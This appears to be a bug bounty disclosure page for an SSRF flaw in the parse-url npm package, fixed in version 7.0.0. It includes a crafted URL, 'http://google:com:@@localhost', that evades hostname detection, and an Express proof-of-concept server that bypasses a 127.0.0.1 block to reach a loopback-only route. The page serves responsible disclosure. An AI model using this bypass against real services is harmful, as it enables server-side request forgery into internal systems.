SSRF via Improper Input Validation in ionicabizau/parse-url

Valid

Reported on

Jun 17th 2022


Description

The hostname is not detected because of improper handling of the username and password. (Based on real cases)

Proof of Concept

❯ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("http://google:com:@@localhost"))'
{
  protocols: [ 'http' ],
  protocol: 'http',
  port: null,
  resource: 'google:com:@@localhost',
  user: '',
  pathname: '',
  hash: '',
  search: '',
  href: 'http://google:com:@@localhost',
  query: [Object: null prototype] {}
}

When receiving the above URL, the hostname is localhost, but it is not detected.

// PoC server. Needs a vulnerable parse-url (the report marks 7.0.0 as the fixed version).
const parseUrl = require("parse-url");
const express = require('express');
const http = require('http');
const app = express();

// Middleware that only lets a request through when it arrived over the loopback interface.
const isLocal = () => (req, res, next) =>
    (req.connection.remoteAddress === '::ffff:127.0.0.1' || req.connection.remoteAddress === '::1')
        ? next()
        : res.json({'state':'You\'re not locally'});

// parse-url returns the whole "google:com:@@127.0.0.1" string as the resource,
// so the 127.0.0.1 comparison below never matches.
const parsed = parseUrl("http://google:com:@@127.0.0.1:9999/ssrf_check");
console.log(parsed);

app.get('/', (req, res) => {
    if(parsed.resource == '127.0.0.1'){
        res.send('Not good');
    } else{
        // Node's own URL parser resolves the same href to host 127.0.0.1, port 9999,
        // so this request reaches the /ssrf_check route below.
        http.get(parsed.href).on('error', (err) => console.error(err.message));
        res.send('Good');
    }
});

app.get('/ssrf_check', isLocal(), (req, res) =>{
    console.log('ssrf bypass');
    res.send(true);
});

app.listen(9999);

The above PoC code forbids the use of the 127.0.0.1 host. However, by using the above vulnerability, it is possible to bypass this check and perform an SSRF attack.

Impact

Bypass hostname check (SSRF)

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. a year ago
Pocas modified the report
a year ago
Pocas modified the report
a year ago
Pocas
a year ago

Researcher


❯ node -e "const parser = require('url-parse');console.log(parser('http://google:com:@@asdf'))"
{
  slashes: true,
  protocol: 'http:',
  hash: '',
  query: '',
  pathname: '/',
  auth: 'google:com%3A%40',
  host: 'asdf',
  port: '',
  hostname: 'asdf',
  password: 'com%3A%40',
  username: 'google',
  origin: 'http://asdf',
  href: 'http://google:com%3A%40@asdf/'
}
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back a year ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. a year ago
Ionică
a year ago

Maintainer


Thank you for this finding!

Ionică Bizău (Johnny B.) validated this vulnerability a year ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) marked this as fixed in 7.0.0 with commit 21c72a a year ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
This vulnerability will not receive a CVE